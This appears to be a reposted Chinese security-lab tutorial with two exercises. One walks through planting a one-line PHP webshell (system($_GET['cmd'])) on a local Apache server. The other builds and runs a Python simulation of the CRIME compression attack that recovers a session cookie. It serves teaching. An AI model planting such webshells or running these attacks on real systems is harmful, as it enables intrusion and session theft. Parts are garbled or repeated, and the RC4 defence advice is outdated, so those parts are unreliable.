#!/usr/bin/python3
import string
import zlib
import sys
import random
charset = string.letters + string.digits
COOKIE = ''.join(random.choice(charset) for x in range(30))
HEADERS = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */*\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret="+COOKIE+"\r\n"
"Accept-Encoding: gzip,deflate,sdch\r\n"
"Accept-Language: en-US,en;q=0.8\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
"\r\n")
BODY = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */*\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret=")
cookie = ""
def compress(data):
c = zlib.compressobj()
return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
def getposset(perchar,chars):
posset = []
baselen = len(compress(HEADERS+perchar))
for i in chars:
t = len(compress(HEADERS+ perchar+i))
if (t<=baselen):
posset += i
return posset
def doguess():
global cookie
while len(cookie)<30:
posset = getposset(BODY+cookie,charset)
trun = 1
tem_posset = posset
while 1<len(posset):
tem_body = BODY[trun:]
posset = getposset(tem_body+cookie,tem_posset)
trun = trun +1
if len(posset)==0:
return False
cookie += posset[0]
print (posset[0])
return True
while BODY.find("\r\n")>=0:
if not doguess():
print ("(-)Changebody")
BODY = BODY[BODY.find("\r\n") + 2:]
print ("(+)orign cookie"+COOKIE)
print ("(+)Gotten cookie"+cookie)
文件存在
#!/usr/bin/python3 importstring importzlib importsys importrandom charset=string.letters+string.digits COOKIE=''.join(random.choice(charset)forxinrange(30)) HEADERS=("POST/HTTP/1.1\r\n" "Host:thebankserver.com\r\n" "Connection:keep-alive\r\n" "User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.1(KHTML,likeGecko)Chrome/22.0.1207.1Safari/537.1\r\n" "Accept:*/*\r\n" "Referer:https://thebankserver.com/\r\n" "Cookie:secret="+COOKIE+"\r\n" "Accept-Encoding:gzip,deflate,sdch\r\n" "Accept-Language:en-US,en;q=0.8\r\n" "Accept-Charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n" "\r\n") BODY=("POST/HTTP/1.1\r\n" "Host:thebankserver.com\r\n" "Connection:keep-alive\r\n" "User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.1(KHTML,likeGecko)Chrome/22.0.1207.1Safari/537.1\r\n" "Accept:*/*\r\n" "Referer:https://thebankserver.com/\r\n" "Cookie:secret=") cookie="" defcompress(data): c=zlib.compressobj() returnc.compress(data)+c.flush(zlib.Z_SYNC_FLUSH) defgetposset(perchar,chars): posset=[] baselen=len(compress(HEADERS+perchar)) foriinchars: t=len(compress(HEADERS+perchar+i)) if(t<=baselen): posset+=i returnposset defdoguess(): globalcookie whilelen(cookie)<30: posset=getposset(BODY+cookie,charset) trun=1 tem_posset=posset while1<len(posset): tem_body=BODY[trun:] posset=getposset(tem_body+cookie,tem_posset) trun=trun+1 iflen(posset)==0: returnFalse cookie+=posset[0] print(posset[0]) returnTrue whileBODY.find("\r\n")>=0: ifnotdoguess(): print("(-)Changebody") BODY=BODY[BODY.find("\r\n")+2:] print("(+)origncookie"+COOKIE) print("(+)Gottencookie"+cookie)
操作正确,评测通过!
#!/usr/bin/python3
import string
import zlib
import sys
import random
charset = string.letters + string.digits
COOKIE = ''.join(random.choice(charset) for x in range(30))
HEADERS = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */*\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret="+COOKIE+"\r\n"
"Accept-Encoding: gzip,deflate,sdch\r\n"
"Accept-Language: en-US,en;q=0.8\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
"\r\n")
BODY = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */*\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret=")
cookie = ""
def compress(data):
c = zlib.compressobj()
return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
def getposset(perchar,chars):
posset = []
baselen = len(compress(HEADERS+perchar))
for i in chars:
t = len(compress(HEADERS+ perchar+i))
if (t<=baselen):
posset += i
return posset
def doguess():
global cookie
while len(cookie)<30:
posset = getposset(BODY+cookie,charset)
trun = 1
tem_posset = posset
while 1<len(posset):
tem_body = BODY[trun:]
posset = getposset(tem_body+cookie,tem_posset)
trun = trun +1
if len(posset)==0:
return False
cookie += posset[0]
print (posset[0])
return True
while BODY.find("\r\n")>=0:
if not doguess():
print ("(-)Changebody")
BODY = BODY[BODY.find("\r\n") + 2:]
print ("(+)orign cookie"+COOKIE)
print ("(+)Gotten cookie"+cookie)
任务描述
本关任务:了解Webshell
相关知识
为了完成本关任务,你需要掌握:
1.Webshell
Webshell
本质上是放置在服务器上的脚本文件,由于其调用了操作系统的一些函数,于是拥有了与shell 类似的功能。
实验步骤
完成Webshell实验
实验步骤一,安装http服务器
更新软件源
# apt-get update
安装apache http服务
# apt-get install apache2
实验步骤二,安装php
# apt-get install php
# apt-get install libapache2-mod-php
# vim /etc/php/7.0/apache2/php.ini
allow_url_include = On
# echo "ServerName localhost:80" >> /etc/apache2/apache2.conf
实验步骤三,创建一个简单的webshell界面
# cd /root
# touch test.php
# echo '<?php system($_GET['cmd']);?>' >> test.php
实验步骤四,将页面复制到Web服务器当中
# cp test.php /var/www/html
# service apache2 restart
实验步骤五,使用浏览器进行浏览 在网址栏输入:
http://127.0.0.1/test.php?cmd=ls
任务描述
本关任务:了解HTTPS攻击的方法
相关知识
为了完成本关任务,你需要掌握:
1.HTTPS攻击
HTTPS攻击
常见HTTPS攻击
1)CRIME攻击
攻击原理
攻击者控制受害者发送大量请求,利用压缩算法的机制猜测请求中的关键信息,根据response长度判断请求是否成功。
攻击前提
攻击者可以获取受害者的网络通信包。(中间人攻击,ISP供应商)
浏览器和服务器支持均支持并使用压缩算法。
攻击者可以控制受害者发送大量请求并可以控制请求内容。
防御方法
客户端可以升级浏览器来避免这种攻击。
• Chrome: 21.0.1180.89 and above
• Firefox: 15.0.1 and above
• Opera: 12.01 and above
• Safari: 5.1.7 and above
服务器端可以通过禁用一些加密算法来防止此类攻击。
Apache
• SSLCompression flag = “SSLCompression off”
• GnuTLSPriorities flag = “!COMP-DEFLATE"
禁止过于频繁的请求。
修改压缩算法流程,用户输入的数据不进行压缩。
随机添加长度不定的垃圾数据。
2)TIME攻击
攻击原理
攻击者控制受害者发送大量请求,利用压缩算法的机制猜测请求中的关键信息,根据response响应时间判断请求是否成功。其实TIME和CRIME一样都利用了压缩算法,只不过CRIME是通过长度信息作为辅助,而TIME是通过时间信息作为辅助。
攻击前提
攻击者可以控制受害者发送大量请求并可以控制请求内容。
稳定的网络环境。
防御方法
在解密Response过程中加入随机的短时间延迟。
阻止短时间内的频繁请求。
3)BEAST
攻击原理
攻击者控制受害者发送大量请求,利用CBC加密模式猜测关键信息。
攻击前提
攻击者可以获取受害者的网络通信包。(中间人攻击,ISP供应商)
攻击者需要能得到发送敏感数据端的一部分权限。以便将自己的信息插入SSL/TLS会话中。
攻击者需要准确的找出敏感数据的密文段。
攻击这可以控制受害者发送大量请求并可以控制请求内容。
防御方法
使用RC4加密模式代替BCB加密模式。
部署TLS 1.1或者更高级的版本,来避免SSL 3.0/TLS 1.0带来的安全问题。
在服务端设置每传输固定字节,就改变一次加密秘钥。
实验步骤
完成HTTPS攻击实验
Python利用CRIME思路验证攻击可行性
实验步骤一,进入Python交互模式:
# cd /root
# python3
Python 3.6.9 (default, Jul 17 2020, 12:50:27)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>
实验步骤二,导入模块:
>>> import string
>>> import zlib
>>> import sys
>>> import random
实验步骤三,定义字符集:
>>> charset = string.ascii_letters + string.digits
实验步骤四,定义COOKIE:
>>> COOKIE = ''.join(random.choice(charset) for x in range(30))
实验步骤五,定义头部信息:
HEADERS = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret="+COOKIE+"\r\n"
"Accept-Encoding: gzip,deflate,sdch\r\n"
"Accept-Language: en-US,en;q=0.8\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.3\r\n"
"\r\n")
实验步骤六,定义BODY:
、
实验步骤七,定义cookie:
BODY = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */*\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret=")
>>> cookie = ""
实验步骤八,定义猜测方法:
>>> def compress(data):
...
... c = zlib.compressobj()
... return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
>>> def getposset(perchar,chars):
... posset = []
... baselen = len(compress(HEADERS+perchar))
... for i in chars:
... t = len(compress(HEADERS+ perchar+i))
... if (t<=baselen):
... posset += i
... return posset
>>> def doguess():
... global cookie
... while len(cookie)<30:
... posset = getposset(BODY+cookie,charset)
... trun = 1
... tem_posset = posset
... while 1<len(posset):
... tem_body = BODY[trun:]
... posset = getposset(tem_body+cookie,tem_posset)
... trun = trun +1
... if len(posset)==0:
... return False
... cookie += posset[0]
... print(posset[0])
... return True
实验步骤九,猜测循环体:
>>> while BODY.find("\r\n")>=0:
... if not doguess():
... print ("(-)Changebody")
... BODY = BODY[BODY.find("\r\n") + 2:]
实验步骤十,编写输入代码:
>>> print("(+)orign cookie"+COOKIE)
>>> print("(+)Gotten cookie"+cookie)
实验步骤十一,将上述步骤编写为执行文件:
输入命令:
# vi /root/CRIME.py
输入内容:
#!/usr/bin/python3
import string
import zlib
import sys
import random
charset = string.letters + string.digits
COOKIE = ''.join(random.choice(charset) for x in range(30))
HEADERS = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */*\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret="+COOKIE+"\r\n"
"Accept-Encoding: gzip,deflate,sdch\r\n"
"Accept-Language: en-US,en;q=0.8\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
"\r\n")
BODY = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */*\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret=")
cookie = ""
def compress(data):
c = zlib.compressobj()
return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
def getposset(perchar,chars):
posset = []
baselen = len(compress(HEADERS+perchar))
for i in chars:
t = len(compress(HEADERS+ perchar+i))
if (t<=baselen):
posset += i
return posset
def doguess():
global cookie
while len(cookie)<30:
posset = getposset(BODY+cookie,charset)
trun = 1
tem_posset = posset
while 1<len(posset):
tem_body = BODY[trun:]
posset = getposset(tem_body+cookie,tem_posset)
trun = trun +1
if len(posset)==0:
return False
cookie += posset[0]
print (posset[0])
return True
while BODY.find("\r\n")>=0:
if not doguess():
print ("(-)Changebody")
BODY = BODY[BODY.find("\r\n") + 2:]
print ("(+)orign cookie"+COOKIE)
print ("(+)Gotten cookie"+cookie)
# python CRIME.py
B
r
Z
c
M
2
l
4
s
7
(-)Changebody
w
F
9
K
6
8
E
w
E
P
t
W
a
U
(-)Changebody
i
E
N
9
r
1
(-)Changebody
(-)Changebody
(-)Changebody
(-)Changebody
(+)orign cookieBrZcM2l4s7wF9K68EwEPtWaUiEN9r1
(+)Gotten cookieBrZcM2l4s7wF9K68EwEPtWaUiEN9r1
将结果保存到文件中:
# python CRIME.py > /root/HTTPS.txt
任务:
完成实验。
开始你的任务吧,祝你成功!
版权归原作者 你若盛开,清风自来! 所有, 如有侵权,请联系我们删除。